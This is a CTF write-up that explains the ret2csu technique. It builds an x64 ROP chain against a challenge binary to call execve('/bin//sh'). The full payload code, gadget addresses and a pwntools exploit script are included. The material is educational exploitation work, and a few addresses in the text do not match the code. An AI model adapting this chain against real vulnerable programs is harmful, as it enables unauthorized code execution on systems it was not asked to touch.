Based on the Stop, ROP, n’, Roll challenge from this year’s Redpwn CTF, this post will explain how to make system calls on x64 using ROP in order to spawn a shell. Also, it shows how to abuse writable memory regions of a process to overcome difficulties with some ROP gadgets. And the best thing is, two of the gadgets used in this writeup are universal and most likely also present in your x64 target if it’s using glibc. Of course, everything will be done with radare2
and pwntools
.
The challenge binary can be found here.
ret2csu Basics
The ret2csu technique, which has been presented at Black Hat Asia in 2018, is based on two specific ROP gadgets that are present in the __libc_csu_init()
function. Lets’ quote the authors of the ret2csu paper to explain why this function is even there:
The problem appears when an application is Dynamically compiled, which represents 99% of all applications. More precisely when the linker “attaches code” to the ELF executable that is not coming from the source code of the application. In other words the resulting ELF executable contains not only the compiled source code from the application but already compiled code from statically linked libraries “.a” and object files “.o” even when it is dynamically compiled.
In other words, if a binary is dynamically linked and it’s using glibc, these gadgets will be present – even if it’s only a simple Hello World application. These gadgets can be handy in order to populate certain registers and alter the program flow. Moreover, the gadgets will always be mapped since __libc_csu_init()
is getting executed before main()
. There’s a lot more to this exploitation technique and to fully understand it I recommend checking out the original paper linked above.
Ok So What Are Those Gadgets?
It seems that the structure of the first gadget varies depending on the compiler version. I’ve found quite a few variations of it, so it’s always worth a check. Below you can find the first gadget as found in the challenge binary:
mov rdx, r15
mov rsi, r14
mov edi, r13d
call qword [r12 + rbx*8]
And the Second one is:
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
Cool.
Let’s analyze the challenge binary before finding a way to make use of those gadgets.
The Target
Upon executing the binary, it asks for an input:
[#] number of bytes:
The input is being read by the target using the function get_int()
which uses scanf()
in combination with the %zu
format string internally. This basically gets an unsigned integer from the user input. An interesting thing to notice is that the user input serves as a parameter for the following read()
call:
call sym.get_int # get integer, sets RAX to result value
mov qword [fildes], rax
mov rax, qword [fildes]
mov ecx, eax
lea rax, [buf]
mov edx, 0x186a0 # size
mov rsi, rax # *buf
mov edi, ecx # file descriptor
call sym.imp.read
This means that in order to input additional data via read()
, the file descriptor has to be 0
which corresponds to STDIN
. Using this read()
call it’s possible to overflow buf
which resides at RBP - 0x9
. The overflow happens after 17 bytes, as determined by passing a De Bruijn pattern using ragg2 -r -P 100
.
First, set a breakpoint in read()
at the ret
instruction. Using this breakpoint it’s possible to check what’s about to be loaded into the instruction pointer:
[0x7fda3bd53338]> pxr @rsp # Check what's on the top of the stack
0x7fff9bea9518 0x4941414841414741 AGAAHAAI @rsp ascii ('A') # This will be loaded into the instruction pointer
0x7fff9bea9520 0x41414b41414a4141 AAJAAKAA ascii ('A')
[...]
[0x7fda3bd53338]> wopO 0x4941414841414741 # Search for this value in the passed pattern
17
Now that the instruction pointer is under control, it’s necessary to develop a plan for the exploitation. While digging around in the binary, the following things can be found:
- The string at
0x00400860
contains some gibberish that ends in/bin//sh
which suggests that a shell can be spawned through exploitation. The double slashes don’t matter in this case. - One of the unnamed functions,
sym.sub_1337
contains asyscall
gadget.
Combining these two aspects suggests that a shell can be spawned using a system call somehow. Therefore something like execve("/bin/sh", 0, 0)
could potentially be executed.
Building The ROP Chain
The execve
system call takes three parameters. This means the registers have to be set up in the following way:
RDI
has to point to/bin//sh
RSI
has to be zeroRDX
also has to be zero
Finding The Gadgets
RDI
could be set viapop RDI; ret
at0x400823
RSI
could be set usingpop RSI; pop r15; ret
at0x00400821
Ok so what about RDX
?
Unfortunately this register is not zero after processing a ROP chain that could exploit the binary, so this has to be set to zero manually.
Of course, the __libc_csu_init()
function is also present in this x64 binary. It contains both ret2csu gadgets mentioned before:
mov rdx, r15; mov rsi, r14; call qword [r12 + rbx*8]
at0x00400800
(jump-to-syscall gadget)pop r12; pop r13; pop r14; pop r15
at0x0040081c
(POP gadget)
Sure enough, the first gadget can be used to set RDX
using r15
, which in turn can be controlled with the second gadget.
There’s only one problem: The call qword [r12 + rbx*8]
instruction at the end of the first gadget will fail in case r12
isn’t set up properly, since this register may point into some weird memory locations we can’t call
into. The RBX
register is zero at the point of executing this instruction, so this doesn’t have to be addressed.
Dealing With The Call Instruction
Since r12
is under control using the second ret2csu gadget, we only have to find a fitting memory location to jump to that doesn’t break the program flow. It makes sense to let the call
instruction jump to the syscall
gadget since all registers can be set accordingly up to this point. These things are known now:
r12
has to point to a memory location that contains the address of thesyscall
gadget. Remember, it’scall [r12]
and notcall r12
.- We have
scanf()
available which can write user input into a desired location. - There’s a writable memory location available in the memory space of the process, beginning at
0x602000
. This was determined with thedm
command ofradare2
while debugging the application. Luckily, the start of the memory location doesn’t seem to be used yet :)
With all these things combined, a call to scanf("%zu", 0x602000)
could solve this problem. The pwntools
library will be utilized to send the address of the syscall
gadget into the target process after calling scanf()
with the ROP chain.
Getting The Syscall Number
One last thing: The execve
system call itself is identified by the number 59
. This number has to be loaded into RAX
before jumping to the syscall
gadget.
Reading a number is what the application does when executing it normally. It uses get_int()
for this:
[0x00400600]> pdf@sym.get_int
/ (fcn) sym.get_int 43
| sym.get_int ();
| ; var int32_t var_8h @ rbp-0x8
| ; CALL XREF from main @ 0x400790
| 0x00400710 55 push rbp
| 0x00400711 4889e5 mov rbp, rsp
| 0x00400714 4883ec10 sub rsp, 0x10
| 0x00400718 488d45f8 lea rax, [var_8h]
| 0x0040071c 4889c6 mov rsi, rax
| 0x0040071f 488d3d2c0500. lea rdi, [0x00400c52]
| 0x00400726 b800000000 mov eax, 0
| 0x0040072b e8c0feffff call sym.imp.__isoc99_scanf
| 0x00400730 e8abfeffff call sym.imp.getchar
| 0x00400735 488b45f8 mov rax, qword [var_8h] # RAX = Result
| 0x00400739 c9 leave
\ 0x0040073a c3 ret
The integer that’s being read is stored in RAX
which is just what’s required to call execve
at this point.
Ok How To Build The ROP Chain?
Like this:
- Write the address of the
syscall
gadget into the writable memory region (0x60200
) withscanf()
. - Get the
execve
system call number (59
) intoRAX
withget_int()
. - Setup the registers with the POP-gadget: Load the address of
/bin//sh
and the address of the writable memory region (0x60200
). - Execute the jump-to-syscall gadget
- Have a shell
Or in code:
BINSH = p64(0x400c49)
SYSCALL = str(0x400703)
JUMP_TO_SYSCALL = p64(0x00400800)
POP_RDI = p64(0x400823)
POP_RSI_r15 = p64(0x00400821)
GET_INT = p64(0x00400710)
SCANF = p64(0x004005f0)
RET = p64(0x00400831)
POP = p64(0x0040081c)
PAYLOAD = ""
PAYLOAD += "A" * PADDING # 17
# Setup the parameters for scanf("%zu", 0x60200)
PAYLOAD += POP_RDI
PAYLOAD += p64(0x00400c52) # format string for scanf()
PAYLOAD += POP_RSI_r15
PAYLOAD += p64(0x602000) # rw region
PAYLOAD += p64(0x0) # we don't care about r15 now
# Call scanf()
PAYLOAD += p64(elf.sym["__isoc99_scanf"])
# Get the system call number of execve (59) into RAX
PAYLOAD += RET
PAYLOAD += GET_INT
PAYLOAD += POP
PAYLOAD += p64(0x602000) # r12 (for CALL in JUMP_TO_SYSCALL gadget)
PAYLOAD += BINSH # r13 (will be RDI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r14 (will be RSI via JUMP_TO_SYSCALL gadget)
PAYLOAD += p64(0x0) # r15 (will be RDX via JUMP_TO_SYSCALL gadget)
PAYLOAD += RET
PAYLOAD += p64(JUMP_TO_SYSCALL)
Exploitation With pwntools
The exploited process reads user input four times:
- The file descriptor:
0
forSTDIN
- The actual ROP payload
- The address of the
syscall
gadget viascanf()
- The system call number of
execve
viaget_int()
Because of this, the exploitation has to be automated with pwntools
as follows:
p = process("./srnr")
p.sendline("0")
p.sendline(PAYLOAD)
p.sendline(SYSCALL) # Address of the syscall gadget
p.sendline("59")
p.interactive()
Here’s a demo of the exploit, starting from the last ROP gadget:
That’s it.